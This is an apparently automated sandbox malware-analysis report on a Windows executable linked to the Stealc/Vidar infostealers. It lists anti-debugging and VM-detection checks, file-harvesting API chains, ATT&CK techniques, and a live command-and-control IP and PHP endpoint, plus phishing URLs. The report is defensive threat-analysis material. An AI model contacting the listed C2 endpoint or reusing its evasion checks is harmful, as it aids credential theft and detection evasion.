                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5B8 second address: 128C5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F04D4C82A54h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5D0 second address: 128C5ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C79EB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128C5ED second address: 128C627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F04D4C82A55h 0x00000012 jmp 00007F04D4C82A52h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12972C6 second address: 12972CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C50 second address: 1296C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C54 second address: 1296C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F04D4C79EB4h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1296C78 second address: 1296C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CC9 second address: 12A1CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F04D4C79EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CD8 second address: 12A1CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04D4C82A58h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1CF6 second address: 12A1D17 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F04D4C79EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1D17 second address: 12A1D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A1D1D second address: 12A1D27 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F04D4C79EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9715 second address: 12A9752 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F04D4C82A59h 0x00000008 pop ebx 0x00000009 push edx 0x0000000a jmp 00007F04D4C82A51h 0x0000000f pop edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 js 00007F04D4C82A4Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A9752 second address: 12A976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F04D4C79EB5h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1041A4C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1041B3F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 128CEDD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13684
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13681
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13696
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13701
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-13736
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DE45C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: RProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2163147892.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (flattened by extraction; only the techniques this analysis flagged are listed, grouped by tactic column, with the report's own count badges kept exactly as extracted in front of each technique name):

Execution: 2 Command and Scripting Interpreter; 11 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol

No techniques were flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Antivirus detection, submitted sample (Source / Detection / Scanner / Label):
- file.exe: 100%, Avira, TR/Crypt.TPM.Gen
- file.exe: 100%, Joe Sandbox ML
No Antivirus matches
No Antivirus matches

Domain scanner results (Source / Detection / Scanner):
- fp2e7a.wpc.phicdn.net: 0%, Virustotal

URL scanner results (Source / Detection / Scanner / Label):
- http://185.215.113.37/: 100%, URL Reputation, malware
- http://185.215.113.37/: 100%, URL Reputation, malware
- http://185.215.113.37: 100%, URL Reputation, malware
- http://185.215.113.37/e2b1563c6670f193.php: 100%, URL Reputation, malware
- http://185.215.113.37/rsonation: 17%, Virustotal

Contacted domains (Name / IP / Active / Malicious / Antivirus Detection / Reputation):
- fp2e7a.wpc.phicdn.net: 192.229.221.95; active: true; malicious: false; reputation: unknown

Contacted URLs (Name / Malicious / Antivirus Detection / Reputation):
- http://185.215.113.37/: malicious: true; two URL Reputation hits: malware; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.php: malicious: true; URL Reputation: malware; reputation: unknown

URLs from memory and binaries (Name / Source / Malicious / Antivirus Detection / Reputation; the characters trailing some URLs are memory-string residue and are reproduced as the report lists them):
- http://185.215.113.37: file.exe, 00000000.00000002.2206022743.000000000195E000.00000004.00000020.00020000.00000000.sdmp; malicious: true; URL Reputation: malware; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.phpoW: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/rsonation: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.phpE: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/KW: file.exe, 00000000.00000002.2206022743.00000000019B7000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.php4: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.phpY: file.exe, 00000000.00000002.2206022743.00000000019D1000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
- http://185.215.113.37/e2b1563c6670f193.phpIh: file.exe, 00000000.00000002.2206022743.00000000019A1000.00000004.00000020.00020000.00000000.sdmp; malicious: true; reputation: unknown
Contacted IPs (IP / Domain / Country / ASN / ASN Name / Malicious):
- 185.215.113.37: domain unknown; Portugal; ASN 206894, WHOLESALECONNECTIONSNL; malicious: true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1540731
                            Start date and time:2024-10-24 04:00:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 82
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
Context: IP (Match / Associated Sample Name / Detection / Threat Name / Context; the SHA 256 and Link columns were "Get hash" and "Browse" links in the original and carry no text)
185.215.113.37:
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; LummaC, Amadey, LummaC Stealer, Stealc, Vidar; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar; context: 185.215.113.37/e2b1563c6670f193.php
- file.exe; malicious; Stealc; context: 185.215.113.37/e2b1563c6670f193.php
Context: Domain (Match / Associated Sample Name or URL / Detection / Threat Name / Context; SHA 256 and Link columns were links only)
fp2e7a.wpc.phicdn.net:
- http://360mozambique.com/; malicious; Unknown; context: 192.229.221.95
- https://go.board.com/u/MDYzLVhVUC03MjQAAAGWWmuBSHLu2qnjT2fd3i42hMc8hwQGFhiaAKjDUUamE35KumMEYtASBjkNxUKrq50VZoODfB4=; malicious; Unknown; context: 192.229.221.95
- https://www.amalkongsirezeki20245.org-now.info/; malicious; Unknown; context: 192.229.221.95
- https://www.paypal.com/invoice/payerView/details/INV2-N92X-T2Z2-AHQ9-TKQH?locale.x=en_US&v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000238&utm_unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&ppid=RT000238&cnac=US&rsta=en_US%28en-US%29&unptid=3863e735-915a-11ef-98e8-79ac3b3090e7&calc=f264059569334&unp_tpcid=invoice-buyer-notification&page=main%3Aemail%3ART000238&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.287.1&tenant_name=&xt=145585%2C134644%2C150948%2C104038&link_ref=details_inv2-n92x-t2z2-ahq9-tkqh; malicious; Unknown; context: 192.229.221.95
- https://email.sg.on24event.com/ls/click?upn=u001.7kf5QUY4LGF7Fzt7LGE4bbPPsSPtBC4KXSPVJqWhtiGKhz4oV3PFLo8UDeLKYv23KHw-2BibCQbosx-2BrYm8YSguIMuXvCpYeqDDvEw6xfy3Div01ANz8r2e-2FhGLQvDi-2BscSWac3BuupWFH6VNOvVWTJC9zO-2BHJCietQ-2FJZFwQgpHI-3D-lRS_d2mIoWmaHN9uElWsaXGXS4tx0xN0zdn5dS-2BOd7-2Fl3QSVFRRmw1zxHoUF8IFkv0vPmX9e-2FpcJrwktm83M8wunod8BspGgLLPEF1if2HBchZeffUo4j9EJFkeG71k3QLUGbt-2BPOzOXmt4QJd92N-2FZHTYo2XD8iUgnUizXXtivzF3d3iwCm-2B4LgJBsV4Xj2wRfUmVe-2BZzLNjzm9yfKXdaFtrYnt3SwNpb5k3iumV8n5Skx7pt7Un0CDOQuxQvoQfT71JluCxsB4NeK-2Fb76-2BFnzVpaElc921KXwzYV6gy0TRcRMyq5WidmSlSRF6xkfJgLjfEzUFzNEG7kEBleVDqxb6JQ-3D-3D; malicious; Unknown; context: 192.229.221.95
- https://vmcsolvo.prismhrperformance.com/Login.aspx?AppraisalId=6724; malicious; Phisher; context: 192.229.221.95
- https://email.sg.on24event.com/ls/click?upn=u001.7kf5QUY4LGF7Fzt7LGE4bbPPsSPtBC4KXSPVJqWhtiGKhz4oV3PFLo8UDeLKYv23KHw-2BibCQbosx-2BrYm8YSguIMuXvCpYeqDDvEw6xfy3Div01ANz8r2e-2FhGLQvDi-2Bsc6FaIlcwFy323lwaarteGjoXmAWZ77DlZFrOHhjmiQr0-3DAi8m_lHclm8QYORDEd2i1pY8iiMApMxjKNwDzndXGWMwL-2FVaDLkCrIb-2FgQKm-2FutG0KO72H4SwpKalRDTUzZfsGO863iRy8WKrdz16mk5ZOGquq7bqjhyuPTPBO-2B-2FobhNL-2Fiw0sbfNj7OSue-2FIppdS72L8KeReKi2sYygPTTUQ6FAZhpELqizFuVYiSYb7LJ3FcFAt7VFGjIc0LjDO04TCb7Kr3RXi3OZtFXZptudql-2F9FGONhK9uxyg17fFjiwf-2FcA9HXVgOgmHDjs4LDrNR-2BYyJF8UalpN336eGaZthgfCiWJNcRv5lq5bxuf1619fxrkzY38vtDNJAVjrDOY4sJJgNY5A-3D-3D; malicious; Unknown; context: 192.229.221.95
- https://t.co/JJxL0428u4; malicious; Unknown; context: 192.229.221.95
- https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLg; malicious; Unknown; context: 192.229.221.95
- https://app.pandadoc.com/document/v2?token=69b8ae0059c2551a9a27ed1b65653c1a0b5ee1ff; malicious; Unknown; context: 192.229.221.95
Context: ASN (Match / Associated Sample Name / Detection / Threat Name / Context; SHA 256 and Link columns were links only)
WHOLESALECONNECTIONSNL:
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37
- file.exe; malicious; LummaC, Amadey, LummaC Stealer, Stealc, Vidar; context: 185.215.113.16
- file.exe; malicious; Stealc; context: 185.215.113.37
- file.exe; malicious; Stealc; context: 185.215.113.37
- file.exe; malicious; Stealc, Vidar; context: 185.215.113.37
- file.exe; malicious; Stealc; context: 185.215.113.37
- file.exe; malicious; Stealc; context: 185.215.113.37
- file.exe; malicious; LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar; context: 185.215.113.16
- file.exe; malicious; Stealc; context: 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948392018956134
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'918'464 bytes
                            MD5:7cec6eefc34f3702d47fa5a28cbbb929
                            SHA1:dfe6aa0c35d17240cc857447d90614cec2d05b1a
                            SHA256:a6f91d78572a12eb6f938220ee73f01ee43ef6fdfaaedf8439c0be80553dd841
                            SHA512:a8084f055dd47af7fd85131424d7eb1f4f209c976e3147d1f11d0c5632dbc4dedd790f7c65b0811a64a8458a9bea4877a6cc33c5b01b5ee49982ed1fffc2f912
                            SSDEEP:49152:4YSJ4c9/mvcJh6c+6wujKJg2B9ORT/ZpLFnzOf:RSJ4q/Ph6c+6wd9OR/ZHq
                            TLSH:B195336B0AC1D922C3F76FB12A1AE20429254BD4F942CFD15E78F36F560423CA27B5D6
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xac9000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction: jmp 00007F04D4EF805Ah
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Data directories (Name / Virtual Address / Virtual Size / Is in Section):
- IMAGE_DIRECTORY_ENTRY_IMPORT: 0x25d050, 0x64, .idata
- IMAGE_DIRECTORY_ENTRY_BASERELOC: 0x25d1f8, 0x8, .idata
- IMAGE_DIRECTORY_ENTRY_EXPORT, IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY, IMAGE_DIRECTORY_ENTRY_DEBUG, IMAGE_DIRECTORY_ENTRY_COPYRIGHT, IMAGE_DIRECTORY_ENTRY_GLOBALPTR, IMAGE_DIRECTORY_ENTRY_TLS, IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT, IMAGE_DIRECTORY_ENTRY_IAT, IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, IMAGE_DIRECTORY_ENTRY_RESERVED: 0x0, 0x0 (absent)
